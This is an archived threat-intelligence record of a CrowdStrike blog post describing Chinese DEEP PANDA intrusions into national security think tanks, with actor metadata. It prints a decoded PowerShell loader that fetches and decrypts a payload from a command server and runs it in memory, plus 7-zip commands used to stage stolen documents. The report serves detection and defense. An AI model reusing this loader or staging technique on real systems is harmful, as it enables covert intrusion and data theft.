{ "id": "854e2872-8c9f-4e54-85d7-99ece1c8ca89", "created_at": "2026-04-06T00:21:20.68122Z", "updated_at": "2026-04-10T03:33:22.359992Z", "deleted_at": null, "sha1_hash": "134f05cf90219d65b49397ac50ad88971f6b5fae", "title": "Deep in Thought: Chinese Targeting of National Security Think Tanks »", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 827475, "plain_text": "Deep in Thought: Chinese Targeting of National Security Think\r\nTanks »\r\nBy Dmitri Alperovitch\r\nPublished: 2014-07-07 · Archived: 2026-04-05 16:34:45 UTC\r\nFor some time now, CrowdStrike has been working with a number of national security think tanks and human\r\nrights organizations on a pro bono basis to help them with their security posture. These organizations face some of\r\nthe most advanced nation-state adversaries — China, Russia, and Iran, just to name a few. The individuals who are\r\ntypically targeted at these institutions tend to be former senior government officials who still have lots of contacts\r\nwithin Western governments and, as such, their private correspondence is of extreme interest to these attackers.\r\nThe intelligence services of these nation states are always on the lookout for any clues they may extract from such\r\nprivate communications that may give them an advanced insight into what options government policy makers are\r\nconsidering on particular issues of interest. At the same time, with access to the victim email mailboxes, the\r\nadversaries can craft very realistic spear-phishing lures to the government contacts of targeted think tank\r\npersonnel by piggybacking on ongoing real conversations and increasing their chances of a successful\r\ncompromise of an official government email account.\r\nDespite this high threat level, these think tanks are organized as non-profits and often do not have the budgets of\r\ncommercial organizations to afford cutting-edge security technologies that can help them effectively detect these\r\nthreats. For this reason, CrowdStrike has provided our Falcon Host endpoint security technology to many of these\r\norganizations at no charge to them to help detect and attribute these attackers on their networks in real time, as\r\nwell as to receive instantaneous full forensic visibility into their behavior to help with full remediation of any\r\nincident.\r\nRecently, Falcon Host has detected multiple simultaneous compromises at several national security think tanks\r\nfrom an actor we call DEEP PANDA, one of the most advanced Chinese nation-state cyber intrusion groups. For\r\nalmost three years now, CrowdStrike has monitored DEEP PANDA targeting critical and strategic business\r\nverticals including: government, defense, financial, legal, and the telecommunications industries. At the think\r\ntanks, Falcon Host detected targeting of senior individuals involved in geopolitical policy issues, in particular in\r\nthe China/Asia Pacific region. However, last week the unprecedented real-time visibility provided by Falcon Host\r\ninto this actor’s escapades allowed analysts to observe a radical change in targeting.\r\nThis actor, who was engaged in targeting and collection of Southeast Asia policy information, suddenly began\r\ntargeting individuals with a tie to Iraq/Middle East issues. This is undoubtedly related to the recent Islamic State\r\nof Iraq and the Levant (ISIS) takeover of major parts of Iraq and the potential disruption for major Chinese oil\r\ninterests in that country. In fact, Iraq happens to be the fifth-largest source of crude oil imports for China and the\r\ncountry is the largest foreign investor in Iraq’s oil sector. Thus, it wouldn’t be surprising if the Chinese\r\ngovernment is highly interested in getting a better sense of the possibility of deeper U.S. military involvement that\r\nhttps://web.archive.org/web/20200424075623/https:/www.crowdstrike.com/blog/deep-thought-chinese-targeting-national-security-think-tanks/\r\nPage 1 of 7\n\ncould help protect the Chinese oil infrastructure in Iraq. In fact, the shift in targeting of Iraq policy individuals\r\noccurred on June 18, the day that ISIS began its attack on the Baiji oil refinery.\r\nThe Attacks\r\nCrowdStrike’s Falcon Host technology used by these think tanks consists of a tiny (under 5mb in size) kernel\r\nsensor that is deployed on Windows and Mac servers, desktops, and laptops and is able to do real-time detection\r\nand recording of all adversary activities taking place on the system. In addition, by matching the detected\r\nactivities against our vast Adversary Intelligence repository, Falcon Host can automatically attribute the attack to a\r\nknown adversary group and provide details about their motivations, capabilities, and key Tactics, Techniques, and\r\nProcedures (TTPs).\r\nRecently, we detected breaches of these networks via the use of powershell scripts deployed by the adversary as\r\nscheduled tasks on Windows machines. The scripts are passed to the powershell interpreter through the command\r\nline to avoid placement of extraneous files on the victim machine that could potentially trigger AV- or Indicator of\r\nCompromise (IOC)-based detection.\r\nThe scripts were scheduled to call back every two hours to the DEEP PANDA Command and Control (C2)\r\ninfrastructure.\r\nhttps://web.archive.org/web/20200424075623/https:/www.crowdstrike.com/blog/deep-thought-chinese-targeting-national-security-think-tanks/\r\nPage 2 of 7\n\nThe script in the command line is base64 encoded, but when decoded it translates to the following code snippet:\r\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}\r\n$wc = New-Object -TypeName System.Net.WebClient\r\n$wc.Headers.Add(“Accept-Language”, “en-US,en;q=0.” + ([IntPtr]::Size – 1).ToString())\r\n$wc.Headers.Add(“User-Agent”, “Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64;\r\nTrident/6.0)”)\r\n$rndn = Get-Random\r\n$wc.Headers.Add(“Cookie”, “p=” + $rndn)\r\n$data = $wc.DownloadData(“https://\u003cANONYMIZED\u003e/config/oauth/”)\r\n[string[]]$xags = “https://\u003cANONYMIZED\u003e/config/login/”, “WMITool.Program”, “Main”, “/f”, “ssh”, “/s”,\r\n“\u003cANONYMIZED\u003e”, “/p”, “443”\r\n$Passphrase = “\u003cANONYMIZED\u003e”\r\n$salts = “\u003cANONYMIZED\u003e”\r\n$r = new-Object System.Security.Cryptography.RijndaelManaged\r\n$pass = [System.Text.Encoding]::UTF8.GetBytes($Passphrase)\r\n$salt = [System.Text.Encoding]::UTF8.GetBytes($salts)\r\n$r.Key = (new-Object Security.Cryptography.PasswordDeriveBytes $pass, $salt, “SHA1”, 5).GetBytes(32) #256/8\r\n$r.IV = (new-Object Security.Cryptography.SHA1Managed).ComputeHash(\r\n[Text.Encoding]::UTF8.GetBytes($rndn) )[0..15]\r\n$d = $r.CreateDecryptor()\r\n$ms = new-Object IO.MemoryStream @(,$data)\r\n$cs = new-Object Security.Cryptography.CryptoStream $ms,$d,”Read”\r\n$dfs = New-Object System.IO.Compression.GzipStream $cs,\r\n([IO.Compression.CompressionMode]::Decompress)\r\n$msout = New-Object System.IO.MemoryStream\r\n[byte[]]$buffer = new-object byte[] 4096\r\n[int]$count = 0\r\ndo\r\nhttps://web.archive.org/web/20200424075623/https:/www.crowdstrike.com/blog/deep-thought-chinese-targeting-national-security-think-tanks/\r\nPage 3 of 7\n\n{\r\n $count = $dfs.Read($buffer, 0, $buffer.Length)\r\n $msout.Write($buffer, 0, $count)\r\n} while ($count -gt 0)\r\n$dfs.Close()\r\n$cs.Close()\r\n$ms.Close()\r\n$r.Clear()\r\n[byte[]]$bin = $msout.ToArray()\r\n$al = New-Object -TypeName System.Collections.ArrayList\r\n$al.Add($xags)\r\n$asm = [System.Reflection.Assembly]::Load($bin)\r\n$asm.EntryPoint.Invoke($null, $al.ToArray())\r\nsleep 5\r\nExit\r\nOnce executed, it downloads and executes from memory a .NET executable (typically named Wafer), which in\r\nturn typically downloads and runs MadHatter .NET Remote Access Tool (RAT), one of the favorites of DEEP\r\nPANDA. By running them from memory, it leaves no disk artifacts or host-based IOCs that can be identified in\r\nforensic analysis. This is typical for DEEP PANDA — stealth is their specialty and they prefer to operate in a way\r\nthat leaves a minimal footprint on a victim system and often allows them to evade detection for a very long time.\r\ndeeppanda_thinktankblog.png\r\nFor this same reason, DEEP PANDA likes to use webshells to keep low-footprint persistent access to the victim\r\nnetwork, as we’ve covered in our prior blogs. This case was no exception, and that initial webshell implant\r\nallowed them to execute reconnaissance commands such as “tasklist,” “net view,” and “net localgroup\r\nadministrators,” and then afterward to deploy the powershell scripts.\r\nThe adversary used stolen credentials to mount network shares via “net use” command. In one case, they brought\r\nin Cult of the Dead Cow’s NetE tool onto the system, but most of the time they leveraged existing Windows tools\r\nand avoided bringing many new tools into the environment that could make them noisy and easily detectable by\r\ntechnologies that scan for static IOCs.\r\nhttps://web.archive.org/web/20200424075623/https:/www.crowdstrike.com/blog/deep-thought-chinese-targeting-national-security-think-tanks/\r\nPage 4 of 7\n\nAfter using compromised credentials to mount file shares, the adversary was seen compressing data using 7-zip.\r\nThey were adding different document types to compressed files by wildcarding the extensions, such as:\r\n“C:Program Files7-Zip7z” a setup1.log -r -pkkk*** “\\\u003cshare name\u003eusers\u003cUserName\u003e*rtf *doc”\r\n“C:Program Files7-Zip7z” a setup1.log -r -pkkk*** “\\\u003cshare name\u003eusers\u003cUserName\u003e*ppt”\r\nThey knew exactly which users to target based on their research policy area, and they rapidly pivoted from\r\nChina/Asia Pacific policy experts to Iraq/Middle East policy experts once their tasking collection requirements\r\nchanged.\r\nAggressive Use of Ping to Determine Which Machines of Interest are Online\r\nOn one of the compromised machines, the adversary brought in a command-line version of RAR archiver that was\r\nnamed “cftmon.exe” and placed it into “c:windowstemphotfix” directory. The files were encrypted (both file data\r\nand headers) with “uinfw” password and the archive files were named after the initials of each user that had been\r\ntargeted and stored in the same “c:windowstemphotfix” directory.\r\nFor lateral movement, they used WMI to deploy the powershell scripts remotely and setup scheduled tasks on the\r\nremote systems.\r\nhttps://web.archive.org/web/20200424075623/https:/www.crowdstrike.com/blog/deep-thought-chinese-targeting-national-security-think-tanks/\r\nPage 5 of 7\n\nDespite the fact that we were seeing nearly identical TTPs used across multiple think-tank targets, there is\r\nevidence to indicate that these operations had different individuals behind the keyboard based on the intricacies of\r\nhow certain powershell command lines had been used in each case.\r\nSummary\r\nDEEP PANDA presents a very serious threat not just to think tanks, but also multinational financial institutions,\r\nlaw firms, defense contractors, and government agencies. Due to their stellar operational security and reliance on\r\nanti-forensic and anti-IOC detection techniques, detecting and stopping them is very challenging without the use\r\nof next-generation endpoint technology like Falcon Host.  Not only was Falcon Host able to detect this adversary\r\nwithout relying on static signatures or IOCs, but it was able to provide instantaneous and full forensic analysis of\r\nwhat had occurred on each of the compromised endpoints without the need to pull hard drives and do costly and\r\ntime-intensive forensics, substantially reducing the time needed for remediation.\r\nIf you are a non-profit think tank or a human rights organization that would like to take advantage of our no-charge offer of Falcon Host licenses for your servers and desktops, please email us at sales@crowdstrike.com with\r\nthe subject “Non-Profit Falcon Host Offer.”  \r\nOur Falcon Intelligence subscribers have had access to multiple reports on the DEEP PANDA actor that includes\r\nfull analysis of their attribution, tradecraft and TTPs, as well as detection indicators and signatures and\r\nremediation instructions. And our CrowdStrike Services has worked on multiple intrusion investigations related to\r\nDEEP PANDA in the last year. If you would also like to see a demo of Falcon Host or Falcon Intelligence in\r\naction or discuss our Services offerings, please contact our Sales Team to schedule a personal briefing.\r\nhttps://web.archive.org/web/20200424075623/https:/www.crowdstrike.com/blog/deep-thought-chinese-targeting-national-security-think-tanks/\r\nPage 6 of 7\n\nStay safe and keep a watchful eye on the Pandas, Bears, Kittens, and other threat actors who are relentlessly\r\npreying on your data!\r\nSource: https://web.archive.org/web/20200424075623/https:/www.crowdstrike.com/blog/deep-thought-chinese-targeting-national-security-thin\r\nk-tanks/\r\nhttps://web.archive.org/web/20200424075623/https:/www.crowdstrike.com/blog/deep-thought-chinese-targeting-national-security-think-tanks/\r\nPage 7 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "https://web.archive.org/web/20200424075623/https:/www.crowdstrike.com/blog/deep-thought-chinese-targeting-national-security-think-tanks/" ], "report_names": [ "deep-thought-chinese-targeting-national-security-think-tanks" ], "threat_actors": [ { "id": "64ca1755-3883-4173-8e0a-6e5cf92faafd", "created_at": "2022-10-25T15:50:23.636456Z", "updated_at": "2026-04-10T02:00:05.389234Z", "deleted_at": null, "main_name": "Deep Panda", "aliases": [ "Deep Panda", "Shell Crew", "KungFu Kittens", "PinkPanther", "Black Vine" ], "source_name": "MITRE:Deep Panda", "tools": [ "Mivast", "StreamEx", "Sakula", "Tasklist", "Derusbi" ], "source_id": "MITRE", "reports": null }, { "id": "0639667a-fb3f-43d9-a38c-6c123fd19c7f", "created_at": "2022-10-25T16:07:23.335869Z", "updated_at": "2026-04-10T02:00:04.547702Z", "deleted_at": null, "main_name": "APT 19", "aliases": [ "APT 19", "Bronze Firestone", "C0d0so0", "Checkered Typhoon", "Codoso", "Deep Panda", "G0009", "G0073", "Operation Kingslayer", "Red Pegasus", "Sunshop Group", "TG-3551" ], "source_name": "ETDA:APT 19", "tools": [ "Agentemis", "C0d0so0", "Cobalt Strike", "CobaltStrike", "Derusbi", "EmPyre", "EmpireProject", "Fire Chili", "PowerShell Empire", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "46a151bd-e4c2-46f9-aee9-ee6942b01098", "created_at": "2023-01-06T13:46:38.288168Z", "updated_at": "2026-04-10T02:00:02.911919Z", "deleted_at": null, "main_name": "APT19", "aliases": [ "DEEP PANDA", "Codoso", "KungFu Kittens", "Group 13", "G0009", "G0073", "Checkered Typhoon", "Black Vine", "TEMP.Avengers", "PinkPanther", "Shell Crew", "BRONZE FIRESTONE", "Sunshop Group" ], "source_name": "MISPGALAXY:APT19", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f2ce5b52-a220-4b94-ab66-4b81f3fed05d", "created_at": "2025-08-07T02:03:24.595597Z", "updated_at": "2026-04-10T02:00:03.740023Z", "deleted_at": null, "main_name": "BRONZE FIRESTONE", "aliases": [ "APT19 ", "C0d0s0", "Checkered Typhoon ", "Chlorine ", "Deep Panda ", "Pupa ", "TG-3551 " ], "source_name": "Secureworks:BRONZE FIRESTONE", "tools": [ "9002", "Alice's Rabbit Hole", "Cobalt Strike", "Derusbi", "PlugX", "PoisonIvy", "PowerShell Empire", "Trojan Briba", "Zuguo" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434880, "ts_updated_at": 1775792002, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/134f05cf90219d65b49397ac50ad88971f6b5fae.pdf", "text": "https://archive.orkl.eu/134f05cf90219d65b49397ac50ad88971f6b5fae.txt", "img": "https://archive.orkl.eu/134f05cf90219d65b49397ac50ad88971f6b5fae.jpg" } }